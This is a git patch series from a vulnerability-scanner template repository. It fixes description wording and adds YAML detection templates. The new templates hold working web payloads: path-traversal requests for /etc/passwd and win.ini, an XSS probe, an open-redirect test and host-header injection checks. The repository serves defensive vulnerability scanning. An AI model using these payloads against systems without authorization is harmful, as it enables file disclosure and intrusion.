jcr:createdBy, jcr:lastModifiedBy, cq:LastModifiedBy attributes of any JCR node. tags: aem @@ -28,4 +28,4 @@ requests: - type: word part: header words: - - 'application/json' \ No newline at end of file + - 'application/json' diff --git a/misconfiguration/exposed-service-now.yaml b/misconfiguration/exposed-service-now.yaml index c169a53e49..72c6c61cff 100644 --- a/misconfiguration/exposed-service-now.yaml +++ b/misconfiguration/exposed-service-now.yaml @@ -4,7 +4,7 @@ info: name: ITMS-Misconfigured author: dhiyaneshDK severity: info - description: detectes misconfigured Service-now ITSM instances + description: Detection of misconfigured ServiceNow ITSM instances. reference: - https://medium.com/@th3g3nt3l/multiple-information-exposed-due-to-misconfigured-service-now-itsm-instances-de7a303ebd56 - https://github.com/leo-hildegarde/SnowDownKB/ @@ -24,4 +24,4 @@ requests: - type: status status: - - 200 \ No newline at end of file + - 200 diff --git a/misconfiguration/http-missing-security-headers.yaml b/misconfiguration/http-missing-security-headers.yaml index aef6738399..3f53d06de8 100644 --- a/misconfiguration/http-missing-security-headers.yaml +++ b/misconfiguration/http-missing-security-headers.yaml @@ -4,7 +4,7 @@ info: name: HTTP Missing Security Headers author: socketz,geeknik,G4L1T0,convisoappsec,kurohost,dawid-czarnecki severity: info - description: It searches missing security headers, but obviously, could be so less generic and could be useless for Bug Bounty. + description: It searches for missing security headers, but obviously, could be so less generic and could be useless for Bug Bounty. tags: misconfig,generic requests: @@ -124,4 +124,4 @@ requests: - type: regex name: access-control-allow-headers regex: - - "(?i)access-control-allow-headers" \ No newline at end of file + - "(?i)access-control-allow-headers" diff --git a/misconfiguration/laravel-debug-enabled.yaml b/misconfiguration/laravel-debug-enabled.yaml index 06791732aa..7be14a40fd 100644 --- a/misconfiguration/laravel-debug-enabled.yaml +++ b/misconfiguration/laravel-debug-enabled.yaml @@ -2,7 +2,7 @@ id: laravel-debug-enabled info: name: Laravel Debug Enabled author: notsoevilweasel - description: Laravel with APP_DEBUG set to true prone to showing verbose errors. + description: Laravel with APP_DEBUG set to true is prone to show verbose errors. severity: medium tags: debug,laravel,misconfig @@ -19,4 +19,4 @@ requests: - type: status status: - - 200 \ No newline at end of file + - 200 diff --git a/network/deprecated-sshv1-detection.yaml b/network/deprecated-sshv1-detection.yaml index 0897da8dc9..c8dbbcea18 100644 --- a/network/deprecated-sshv1-detection.yaml +++ b/network/deprecated-sshv1-detection.yaml @@ -5,7 +5,7 @@ info: author: iamthefrogy severity: medium tags: network,ssh,openssh - description: SSHv1 is a deprecated and have known cryptographic issues. + description: SSHv1 is deprecated and has known cryptographic issues. reference: - https://www.kb.cert.org/vuls/id/684820 - https://nvd.nist.gov/vuln/detail/CVE-2001-1473 diff --git a/network/mysql-native-cred-bruteforce.yaml b/network/mysql-native-cred-bruteforce.yaml index a13c7b367b..213c71805a 100644 --- a/network/mysql-native-cred-bruteforce.yaml +++ b/network/mysql-native-cred-bruteforce.yaml @@ -5,7 +5,7 @@ info: author: iamthefrogy severity: info tags: network,mysql,bruteforce,db - description: MySQL instance with enabled native password support prone vulnerable for password brute-force attack. + description: MySQL instance with enabled native password support is prone to password brute-force attacks. network: - host: diff --git a/network/openssh5.3-detect.yaml b/network/openssh5.3-detect.yaml index bd7a7338cc..1bfb60d273 100644 --- a/network/openssh5.3-detect.yaml +++ b/network/openssh5.3-detect.yaml @@ -5,7 +5,7 @@ info: author: iamthefrogy severity: low tags: network,openssh - description: OpenSSH 5.3 is vulnerable to username enumeraiton and DoS vulnerabilities. + description: OpenSSH 5.3 is vulnerable to username enumeration and DoS vulnerabilities. reference: - http://seclists.org/fulldisclosure/2016/Jul/51 - https://security-tracker.debian.org/tracker/CVE-2016-6210 diff --git a/vulnerabilities/generic/open-redirect.yaml b/vulnerabilities/generic/open-redirect.yaml index 7190b73c58..b317702918 100644 --- a/vulnerabilities/generic/open-redirect.yaml +++ b/vulnerabilities/generic/open-redirect.yaml @@ -4,7 +4,7 @@ info: name: Open URL redirect detection author: afaq,melbadry9,Elmahdi,pxmme1337,Regala_,andirrahmani1,geeknik severity: low - description: A user-controlled input redirect users to an external website. + description: A user-controlled input redirects users to an external website. tags: redirect,generic requests: diff --git a/vulnerabilities/other/couchdb-adminparty.yaml b/vulnerabilities/other/couchdb-adminparty.yaml index 6e387de0fd..cf0c635784 100644 --- a/vulnerabilities/other/couchdb-adminparty.yaml +++ b/vulnerabilities/other/couchdb-adminparty.yaml @@ -4,7 +4,7 @@ info: name: CouchDB Admin Party author: organiccrap severity: high - description: Requests made against CouchDB is done in the context of an admin user. + description: Requests made against CouchDB are done in the context of an admin user. tags: couchdb requests: diff --git a/vulnerabilities/other/eyelock-nano-lfd.yaml b/vulnerabilities/other/eyelock-nano-lfd.yaml index 7e05dfc26c..c6c41baad6 100644 --- a/vulnerabilities/other/eyelock-nano-lfd.yaml +++ b/vulnerabilities/other/eyelock-nano-lfd.yaml @@ -4,7 +4,7 @@ info: name: EyeLock nano NXT 3.5 - Local File Disclosure author: geeknik severity: high - description: nano NXT suffers from a file disclosure vulnerability when input passed thru the 'path' parameter to 'logdownload.php' script is not properly verified before being used to read files. This can be exploited to disclose contents of files from local resources. + description: nano NXT suffers from a file disclosure vulnerability when input passed through the 'path' parameter to 'logdownload.php' script is not properly verified before being used to read files. This can be exploited to disclose contents of files from local resources. reference: https://www.zeroscience.mk/codes/eyelock_lfd.txt tags: iot,lfi,eyelock diff --git a/vulnerabilities/other/kevinlab-bems-backdoor.yaml b/vulnerabilities/other/kevinlab-bems-backdoor.yaml index 54619b0ce4..dd5701ed28 100644 --- a/vulnerabilities/other/kevinlab-bems-backdoor.yaml +++ b/vulnerabilities/other/kevinlab-bems-backdoor.yaml @@ -4,7 +4,7 @@ info: name: KevinLAB BEMS (Building Energy Management System) Undocumented Backdoor Account author: gy741 severity: critical - description: The BEMS solution has an undocumented backdoor account and these sets of credentials are never exposed to the end-user and cannot be changed through any normal operation of the solution thru the RMI. Attacker could exploit this vulnerability by logging in using the backdoor account with highest privileges for administration and gain full system control. The backdoor user cannot be seen in the users settings in the admin panel and it also uses an undocumented privilege level (admin_pk=1) which allows full availability of the features that the BEMS is offering remotely. + description: The BEMS solution has an undocumented backdoor account, and these sets of credentials are never exposed to the end-user and cannot be changed through any normal operation of the solution through the RMI. An attacker could exploit this vulnerability by logging in using the backdoor account with highest privileges for administration and gain full system control. The backdoor user cannot be seen in the users settings in the admin panel, and it also uses an undocumented privilege level (admin_pk=1) which allows full availability of the features that the BEMS is offering remotely. reference: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5654.php tags: kevinlab diff --git a/vulnerabilities/other/kevinlab-hems-backdoor.yaml b/vulnerabilities/other/kevinlab-hems-backdoor.yaml index ea925ce800..7d4152fc83 100644 --- a/vulnerabilities/other/kevinlab-hems-backdoor.yaml +++ b/vulnerabilities/other/kevinlab-hems-backdoor.yaml @@ -4,7 +4,7 @@ info: name: KevinLAB HEMS Undocumented Backdoor Account author: gy741 severity: critical - description: The HEMS solution has an undocumented backdoor account and these sets of credentials are never exposed to the end-user and cannot be changed through any normal operation of the solution thru the RMI. Attacker could exploit this vulnerability by logging in using the backdoor account with highest privileges for administration and gain full system control. The backdoor user cannot be seen in the users settings in the admin panel and it also uses an undocumented privilege level (admin_pk=1) which allows full availability of the features that the HEMS is offering remotely. + description: The HEMS solution has an undocumented backdoor account and these sets of credentials are never exposed to the end-user and cannot be changed through any normal operation of the solution through the RMI. An attacker could exploit this vulnerability by logging in using the backdoor account with highest privileges for administration and gain full system control. The backdoor user cannot be seen in the users settings in the admin panel and it also uses an undocumented privilege level (admin_pk=1) which allows full availability of the features that the HEMS is offering remotely. reference: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5654.php tags: kevinlab,default-login,backdoor @@ -38,4 +38,4 @@ requests: - type: word words: - 'PHPSESSID' - part: header \ No newline at end of file + part: header diff --git a/vulnerabilities/other/netgear-router-auth-bypass.yaml b/vulnerabilities/other/netgear-router-auth-bypass.yaml index 4f6c12b3c8..9bb69eefdd 100644 --- a/vulnerabilities/other/netgear-router-auth-bypass.yaml +++ b/vulnerabilities/other/netgear-router-auth-bypass.yaml @@ -4,7 +4,7 @@ info: name: NETGEAR DGN2200v1 Router Authentication Bypass author: gy741 severity: high - description: NETGEAR decided to use to check if a page has “.jpg”, “.gif” or “ess_” substrings, trying to match the entire URL. We can therefore access any page on the device, including those that require authentication, by appending a GET variable with the relevant substring (like “?.gif”). + description: NETGEAR DGN2200v1 Router does not require authentication if a page has “.jpg”, “.gif”, or “ess_” substrings, however matches the entire URL. Any page on the device can therefore be accessed, including those that require authentication, by appending a GET variable with the relevant substring (e.g., “?.gif”). reference: - https://www.microsoft.com/security/blog/2021/06/30/microsoft-finds-new-netgear-firmware-vulnerabilities-that-could-lead-to-identity-theft-and-full-system-compromise/ - https://kb.netgear.com/000062646/Security-Advisory-for-Multiple-HTTPd-Authentication-Vulnerabilities-on-DGN2200v1 diff --git a/vulnerabilities/other/sar2html-rce.yaml b/vulnerabilities/other/sar2html-rce.yaml index 06555a6586..82c8b1411b 100644 --- a/vulnerabilities/other/sar2html-rce.yaml +++ b/vulnerabilities/other/sar2html-rce.yaml @@ -4,7 +4,7 @@ info: name: sar2html 3.2.1 - 'plot' Remote Code Execution author: gy741 severity: critical - description: SAR2HTML could allow a remote attacker to execute arbitrary commands on the system, caused by a commend injection flaw in the index.php script. By sending specially-crafted commands, an attacker could exploit this vulnerability to execute arbitrary commands on the system. + description: SAR2HTML could allow a remote attacker to execute arbitrary commands on the system, caused by a command injection flaw in the index.php script. By sending specially-crafted commands, an attacker could exploit this vulnerability to execute arbitrary commands on the system. reference: - https://www.exploit-db.com/exploits/49344 tags: sar2html,rce,oob diff --git a/vulnerabilities/springboot/springboot-actuators-jolokia-xxe.yaml b/vulnerabilities/springboot/springboot-actuators-jolokia-xxe.yaml index a8c7121123..51dfc17871 100644 --- a/vulnerabilities/springboot/springboot-actuators-jolokia-xxe.yaml +++ b/vulnerabilities/springboot/springboot-actuators-jolokia-xxe.yaml @@ -4,7 +4,7 @@ info: name: Spring Boot Actuators (Jolokia) XXE author: dwisiswant0,ipanda severity: high - description: A vulnerability in Spring Boot Actuators's 'jolokia' endpoint allows remote attackers to preform an XML External Entities attack, include content stored on a remote server as if it was its own - this has the potential to allow the execution of arbitrary code and/or disclosure of sensitive information from the target machine. + description: A vulnerability in Spring Boot Actuators's 'jolokia' endpoint allows remote attackers to perform an XML External Entities (XXE) attack and include content stored on a remote server as if it was its own. This has the potential to allow the execution of arbitrary code and/or disclosure of sensitive information from the target machine. reference: - https://www.veracode.com/blog/research/exploiting-spring-boot-actuators - https://github.com/mpgn/Spring-Boot-Actuator-Exploit @@ -31,4 +31,4 @@ requests: - type: word words: - "X-Application-Context" - part: header \ No newline at end of file + part: header diff --git a/workflows/azkaban-workflow.yaml b/workflows/azkaban-workflow.yaml index e97f2aa339..944c6b04b2 100644 --- a/workflows/azkaban-workflow.yaml +++ b/workflows/azkaban-workflow.yaml @@ -3,11 +3,11 @@ id: azkaban-workflow info: name: Azkaban Security Checks author: pdteam - description: A simple workflow that runs all azkaban related nuclei templates on a given target. + description: A simple workflow that runs all Azkaban related nuclei templates on a given target. tags: workflow workflows: - template: exposed-panels/azkaban-web-client.yaml subtemplates: - - template: default-logins/azkaban/azkaban-web-client-default-creds.yaml \ No newline at end of file + - template: default-logins/azkaban/azkaban-web-client-default-creds.yaml diff --git a/workflows/bigip-workflow.yaml b/workflows/bigip-workflow.yaml index 10db14b804..315999a816 100644 --- a/workflows/bigip-workflow.yaml +++ b/workflows/bigip-workflow.yaml @@ -3,7 +3,7 @@ id: bigip-workflow info: name: F5 BIG-IP Security Checks author: dwisiswant0 - description: A simple workflow that runs all Bigip related nuclei templates on a given target. + description: A simple workflow that runs all BigIP related nuclei templates on a given target. tags: workflow # Supported on Nuclei v2.2.0 (https://github.com/projectdiscovery/nuclei/releases/tag/v2.2.0) @@ -14,4 +14,4 @@ workflows: - template: technologies/bigip-config-utility-detect.yaml subtemplates: - - template: cves/2020/CVE-2020-5902.yaml \ No newline at end of file + - template: cves/2020/CVE-2020-5902.yaml diff --git a/workflows/lucee-workflow.yaml b/workflows/lucee-workflow.yaml index 6dcd34dc47..3499322be0 100644 --- a/workflows/lucee-workflow.yaml +++ b/workflows/lucee-workflow.yaml @@ -3,10 +3,10 @@ id: lucee-workflow info: name: Lucee Detection Workflow author: geeknik,dhiyaneshDk - description: A simple workflow that runs all Lucee related nuclei templates on given target. + description: A simple workflow that runs all Lucee related nuclei templates on a given target. tags: workflow workflows: - template: technologies/lucee-detect.yaml subtemplates: - - tags: lucee \ No newline at end of file + - tags: lucee diff --git a/workflows/springboot-workflow.yaml b/workflows/springboot-workflow.yaml index 97b372c544..acaad19e2b 100644 --- a/workflows/springboot-workflow.yaml +++ b/workflows/springboot-workflow.yaml @@ -1,9 +1,9 @@ id: springboot-workflow info: - name: Springboot Security Checks + name: Spring Boot Security Checks author: dwisiswant0 - description: A simple workflow that runs all springboot related nuclei templates on a given target. + description: A simple workflow that runs all Spring Boot related nuclei templates on a given target. tags: workflow # Supported on Nuclei v2.2.0 (https://github.com/projectdiscovery/nuclei/releases/tag/v2.2.0) @@ -13,4 +13,4 @@ workflows: - template: technologies/springboot-actuator.yaml subtemplates: - - tags: springboot \ No newline at end of file + - tags: springboot diff --git a/workflows/worksite-takeover-workflow.yaml b/workflows/worksite-takeover-workflow.yaml index ed95574336..41429fc2b8 100644 --- a/workflows/worksite-takeover-workflow.yaml +++ b/workflows/worksite-takeover-workflow.yaml @@ -3,10 +3,10 @@ id: worksite-takeover-workflow info: name: Worksite Takeover Workflow author: pdteam - description: A simple workflow that runs DNS based detection to filter hosts runnng worksite and do further HTTP based check to confirm takeover. + description: A simple workflow that runs DNS based detection to filter hosts running Worksite and do further HTTP based check to confirm takeover. reference: https://blog.melbadry9.xyz/dangling-dns/xyz-services/ddns-worksites workflows: - template: dns/worksites-detection.yaml subtemplates: - - template: takeovers/worksites-takeover.yaml \ No newline at end of file + - template: takeovers/worksites-takeover.yaml From 0835b26f23aa31be4222dabfc780ecbb04cde8c7 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Mon, 6 Sep 2021 06:03:05 +0700 Subject: [PATCH 2047/4083] Create CVE-2010-2920.yaml --- cves/2010/CVE-2010-2920.yaml | 27 +++++++++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 cves/2010/CVE-2010-2920.yaml diff --git a/cves/2010/CVE-2010-2920.yaml b/cves/2010/CVE-2010-2920.yaml new file mode 100644 index 0000000000..48974bc25f --- /dev/null +++ b/cves/2010/CVE-2010-2920.yaml @@ -0,0 +1,27 @@ +id: CVE-2010-2920 + +info: + name: Joomla! Component Foobla Suggestions 1.5.1.2 - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in the Foobla Suggestions (com_foobla_suggestions) component 1.5.1.2 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the controller parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/12120 + - https://www.cvedetails.com/cve/CVE-2010-2920 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_foobla_suggestions&controller=../../../../../../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 From 75bee6e8f5aadd8374d8de5aea8cf73ce48a4cad Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Mon, 6 Sep 2021 07:00:44 +0700 Subject: [PATCH 2048/4083] Create CVE-2010-1472.yaml --- cves/2010/CVE-2010-1472.yaml | 27 +++++++++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 cves/2010/CVE-2010-1472.yaml diff --git a/cves/2010/CVE-2010-1472.yaml b/cves/2010/CVE-2010-1472.yaml new file mode 100644 index 0000000000..4294244baf --- /dev/null +++ b/cves/2010/CVE-2010-1472.yaml @@ -0,0 +1,27 @@ +id: CVE-2010-1472 + +info: + name: Joomla! Component Horoscope 1.5.0 - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in the Daily Horoscope (com_horoscope) component 1.5.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/12167 + - https://www.cvedetails.com/cve/CVE-2010-1472 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_horoscope&controller=../../../../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 From 99d51ba4bcfd783fe4b2f1bd99e25ded515f2d71 Mon Sep 17 00:00:00 2001 From: Roberto Nunes <46332131+Akokonunes@users.noreply.github.com> Date: Mon, 6 Sep 2021 17:54:33 +0900 Subject: [PATCH 2049/4083] Create karel-ip-phone-lfi.yaml --- karel-ip-phone-lfi.yaml | 24 ++++++++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 karel-ip-phone-lfi.yaml diff --git a/karel-ip-phone-lfi.yaml b/karel-ip-phone-lfi.yaml new file mode 100644 index 0000000000..c18a46fbf8 --- /dev/null +++ b/karel-ip-phone-lfi.yaml @@ -0,0 +1,24 @@ +id: karel-ip-phone-lfi + +info: + name: Karel IP Phone IP1211 Web Management Panel - Directory Traversal + author: 0x_Akoko + severity: high + reference: https://cxsecurity.com/issue/WLB-2020100038 + tags: karel,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/cgi-bin/cgiServer.exx?page=../../../../../../../../../../../etc/passwd" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:[x*]:0:0" + + - type: status + status: + - 200 From 37b81df9cc6e432762452daa8cd924c9d306ba61 Mon Sep 17 00:00:00 2001 From: Roberto Nunes <46332131+Akokonunes@users.noreply.github.com> Date: Mon, 6 Sep 2021 17:56:20 +0900 Subject: [PATCH 2050/4083] Create minimouse-lfi.yaml --- minimouse-lfi.yaml | 26 ++++++++++++++++++++++++++ 1 file changed, 26 insertions(+) create mode 100644 minimouse-lfi.yaml diff --git a/minimouse-lfi.yaml b/minimouse-lfi.yaml new file mode 100644 index 0000000000..b5c828851c --- /dev/null +++ b/minimouse-lfi.yaml @@ -0,0 +1,26 @@ +id: minimouse-lfi + +info: + name: Mini Mouse 9.2.0 - Path Traversal + author: 0x_Akoko + severity: high + reference: https://www.exploit-db.com/exploits/49744 + tags: minimouse,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/file=C:%5CWindows%5Cwin.ini" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + words: + - "bit app support" + - "fonts" + - "extensions" + condition: and + part: body From 278ae78af02cb01b5d17965df5fd39dff5f48373 Mon Sep 17 00:00:00 2001 From: Roberto Nunes <46332131+Akokonunes@users.noreply.github.com> Date: Mon, 6 Sep 2021 17:58:24 +0900 Subject: [PATCH 2051/4083] Create CVE-2019-7275.yaml --- CVE-2019-7275.yaml | 19 +++++++++++++++++++ 1 file changed, 19 insertions(+) create mode 100644 CVE-2019-7275.yaml diff --git a/CVE-2019-7275.yaml b/CVE-2019-7275.yaml new file mode 100644 index 0000000000..a3e1a53202 --- /dev/null +++ b/CVE-2019-7275.yaml @@ -0,0 +1,19 @@ +id: CVE-2019-7275 + +info: + name: Open Redirect in Optergy Proton/Enterprise BMS + author: 0x_Akoko + reference: https://cxsecurity.com/issue/WLB-2019110074 + severity: low + tags: cves,optergy,redirect + +requests: + - method: GET + path: + - "{{BaseURL}}/updating.jsp?url=https://example.com/" + + matchers: + - type: regex + regex: + - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$' + part: header From 1f5da5331757d50c1ed7eeebb483e4af23fd2df8 Mon Sep 17 00:00:00 2001 From: Roberto Nunes <46332131+Akokonunes@users.noreply.github.com> Date: Mon, 6 Sep 2021 18:00:23 +0900 Subject: [PATCH 2052/4083] Update minimouse-lfi.yaml --- minimouse-lfi.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/minimouse-lfi.yaml b/minimouse-lfi.yaml index b5c828851c..b87dc7de10 100644 --- a/minimouse-lfi.yaml +++ b/minimouse-lfi.yaml @@ -1,7 +1,7 @@ id: minimouse-lfi info: - name: Mini Mouse 9.2.0 - Path Traversal + name: Mini Mouse 9.2.0 - Path Traversal author: 0x_Akoko severity: high reference: https://www.exploit-db.com/exploits/49744 From 861af1bdc8339b2c65869f1d135a9be5f9ef9ea5 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 6 Sep 2021 14:39:22 +0530 Subject: [PATCH 2053/4083] Update and rename CVE-2019-7275.yaml to cves/2019/CVE-2019-7275.yaml --- CVE-2019-7275.yaml => cves/2019/CVE-2019-7275.yaml | 7 +++++-- 1 file changed, 5 insertions(+), 2 deletions(-) rename CVE-2019-7275.yaml => cves/2019/CVE-2019-7275.yaml (60%) diff --git a/CVE-2019-7275.yaml b/cves/2019/CVE-2019-7275.yaml similarity index 60% rename from CVE-2019-7275.yaml rename to cves/2019/CVE-2019-7275.yaml index a3e1a53202..1945fe217d 100644 --- a/CVE-2019-7275.yaml +++ b/cves/2019/CVE-2019-7275.yaml @@ -3,9 +3,12 @@ id: CVE-2019-7275 info: name: Open Redirect in Optergy Proton/Enterprise BMS author: 0x_Akoko - reference: https://cxsecurity.com/issue/WLB-2019110074 severity: low - tags: cves,optergy,redirect + reference: + - https://packetstormsecurity.com/files/155268/Optergy-Proton-Enterprise-BMS-2.3.0a-Open-Redirect.html + - https://applied-risk.com/resources/ar-2019-008 + - https://cxsecurity.com/issue/WLB-2019110074 + tags: cve,cve2019,redirect requests: - method: GET From 7579fe98c2466fc0d15cdd56ab0f8eb4c88aca55 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 6 Sep 2021 14:44:39 +0530 Subject: [PATCH 2054/4083] Update and rename minimouse-lfi.yaml to vulnerabilities/other/minimouse-lfi.yaml --- minimouse-lfi.yaml => vulnerabilities/other/minimouse-lfi.yaml | 1 + 1 file changed, 1 insertion(+) rename minimouse-lfi.yaml => vulnerabilities/other/minimouse-lfi.yaml (99%) diff --git a/minimouse-lfi.yaml b/vulnerabilities/other/minimouse-lfi.yaml similarity index 99% rename from minimouse-lfi.yaml rename to vulnerabilities/other/minimouse-lfi.yaml index b87dc7de10..2fe4f3ad61 100644 --- a/minimouse-lfi.yaml +++ b/vulnerabilities/other/minimouse-lfi.yaml @@ -17,6 +17,7 @@ requests: - type: status status: - 200 + - type: word words: - "bit app support" From 6ef02fe9dd367e95117881479e663058842e75d8 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 6 Sep 2021 14:47:45 +0530 Subject: [PATCH 2055/4083] Update karel-ip-phone-lfi.yaml --- karel-ip-phone-lfi.yaml | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/karel-ip-phone-lfi.yaml b/karel-ip-phone-lfi.yaml index c18a46fbf8..d911d65f7e 100644 --- a/karel-ip-phone-lfi.yaml +++ b/karel-ip-phone-lfi.yaml @@ -4,7 +4,9 @@ info: name: Karel IP Phone IP1211 Web Management Panel - Directory Traversal author: 0x_Akoko severity: high - reference: https://cxsecurity.com/issue/WLB-2020100038 + reference: + - https://cxsecurity.com/issue/WLB-2020100038 + - https://www.karel.com.tr/urun-cozum/ip1211-ip-telefon tags: karel,lfi requests: From 21a7fc63a50880b0e667023f7d4bf03ed342d21b Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 6 Sep 2021 15:16:12 +0530 Subject: [PATCH 2056/4083] Update CVE-2021-29625.yaml --- cves/2021/CVE-2021-29625.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/cves/2021/CVE-2021-29625.yaml b/cves/2021/CVE-2021-29625.yaml index 65318224ba..26175c05d3 100644 --- a/cves/2021/CVE-2021-29625.yaml +++ b/cves/2021/CVE-2021-29625.yaml @@ -13,13 +13,13 @@ info: requests: - method: GET path: - - '{{BaseURL}}/?server=db&username=root&db=mysql&table=event%27%3E%3Csvg/onload=alert(document.cookie)%3E' + - '{{BaseURL}}/?server=db&username=root&db=mysql&table=event%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' matchers-condition: and matchers: - type: word words: - - "'>" + - "" part: body - type: word From c105e41fa40f0aa7afdbe932d371fc85857ab4d1 Mon Sep 17 00:00:00 2001 From: sandeep Date: Mon, 6 Sep 2021 16:13:17 +0530 Subject: [PATCH 2057/4083] Added OpenVPN Host Header Injection Co-Authored-By: me_dheeraj <9442273+Dheerajmadhukar@users.noreply.github.com> --- vulnerabilities/other/openvpn-hhi.yaml | 27 ++++++++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 vulnerabilities/other/openvpn-hhi.yaml diff --git a/vulnerabilities/other/openvpn-hhi.yaml b/vulnerabilities/other/openvpn-hhi.yaml new file mode 100644 index 0000000000..8da79e0901 --- /dev/null +++ b/vulnerabilities/other/openvpn-hhi.yaml @@ -0,0 +1,27 @@ +id: openvpn-hhi + +info: + name: OpenVPN Host Header Injection + author: twitter.com/Dheerajmadhukar + severity: info + tag: openvpn,hhi + +requests: + - raw: + - | + GET / HTTP/1.1 + Host: {{randstr}}.tld + + matchers-condition: and + matchers: + + - type: word + words: + - "https://{{randstr}}.tld/__session_start__/" + - "openvpn_sess" + part: header + condition: and + + - type: status + status: + - 302 From cec54e6d518e7d5862b904272ea423faccd3c0bc Mon Sep 17 00:00:00 2001 From: sandeep Date: Mon, 6 Sep 2021 16:15:07 +0530 Subject: [PATCH 2058/4083] tags update Co-Authored-By: me_dheeraj <9442273+Dheerajmadhukar@users.noreply.github.com> --- vulnerabilities/other/openvpn-hhi.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/vulnerabilities/other/openvpn-hhi.yaml b/vulnerabilities/other/openvpn-hhi.yaml index 8da79e0901..73ecf8ec1c 100644 --- a/vulnerabilities/other/openvpn-hhi.yaml +++ b/vulnerabilities/other/openvpn-hhi.yaml @@ -4,7 +4,7 @@ info: name: OpenVPN Host Header Injection author: twitter.com/Dheerajmadhukar severity: info - tag: openvpn,hhi + tags: openvpn,hhi requests: - raw: From 47a892d375c7891006e8f196a3a6dc2a1d07c813 Mon Sep 17 00:00:00 2001 From: push4d <50226388+push4d@users.noreply.github.com> Date: Mon, 6 Sep 2021 13:21:29 +0200 Subject: [PATCH 2059/4083] Add files via upload --- cves/2021/CVE-2021-20114.yaml | 20 ++++++++++++++++++++ 1 file changed, 20 insertions(+) create mode 100644 cves/2021/CVE-2021-20114.yaml diff --git a/cves/2021/CVE-2021-20114.yaml b/cves/2021/CVE-2021-20114.yaml new file mode 100644 index 0000000000..c96a554177 --- /dev/null +++ b/cves/2021/CVE-2021-20114.yaml @@ -0,0 +1,20 @@ +id: CVE-2021-20114 + +info: + name: TCExam <= 14.8.1 Exposure of Sensitive Information to an Unauthorized Actor + author: n/a + severity: high + reference: https://es-la.tenable.com/security/research/tra-2021-32?tns_redirect=true + description: | + When installed following the default/recommended settings, TCExam <= 14.8.1 allowed unauthenticated users to access the /cache/backup/ directory, which included sensitive database backup files. + tags: cve,cve2021,tcexam + +requests: + - method: GET + path: + - "{{BaseURL}}/cache/backup/" + + matchers: + - type: status + status: + - 200 \ No newline at end of file From 6563f9be814588136437d2bbd190f654ad3c7b07 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 6 Sep 2021 16:56:14 +0530 Subject: [PATCH 2060/4083] Update CVE-2019-11013.yaml --- cves/2019/CVE-2019-11013.yaml | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/cves/2019/CVE-2019-11013.yaml b/cves/2019/CVE-2019-11013.yaml index ba86250503..afd00e4a16 100644 --- a/cves/2019/CVE-2019-11013.yaml +++ b/cves/2019/CVE-2019-11013.yaml @@ -4,7 +4,9 @@ info: name: Nimble Streamer 3.0.2-2 to 3.5.4-9 - Path Traversal author: 0x_Akoko severity: high - reference: https://www.exploit-db.com/exploits/47301 + reference: + - https://www.exploit-db.com/exploits/47301 + - https://nvd.nist.gov/vuln/detail/CVE-2019-11013 tags: cve,cve2019,lfi,nimble requests: From 6abfcd80e1052425254d2931270b04f3376afc23 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 6 Sep 2021 17:13:20 +0530 Subject: [PATCH 2061/4083] Create host-header-injection.yaml --- .../generic/host-header-injection.yaml | 32 +++++++++++++++++++ 1 file changed, 32 insertions(+) create mode 100644 vulnerabilities/generic/host-header-injection.yaml diff --git a/vulnerabilities/generic/host-header-injection.yaml b/vulnerabilities/generic/host-header-injection.yaml new file mode 100644 index 0000000000..9166fdec4d --- /dev/null +++ b/vulnerabilities/generic/host-header-injection.yaml @@ -0,0 +1,32 @@ +id: host-header-injection + +info: + name: Host Header Injection + author: princechaddha + severity: info + description: HTTP header injection is a general class of web application security vulnerability which occurs when Hypertext Transfer Protocol headers are dynamically generated based on user input. + reference: + - https://portswigger.net/web-security/host-header + - https://portswigger.net/web-security/host-header/exploiting + - https://www.acunetix.com/blog/articles/automated-detection-of-host-header-attacks/ + tags: hostheader-injection,generic + +requests: + - method: GET + path: + - "{{BaseURL}}" + + headers: + Host: "{{randstr}}.tld" + + matchers-condition: and + matchers: + - type: word + words: + - '{{randstr}}.tld' + part: body + condition: and + + - type: status + status: + - 200 From 842f66380f61b163fd9ce94bac8697f9cb4464ca Mon Sep 17 00:00:00 2001 From: 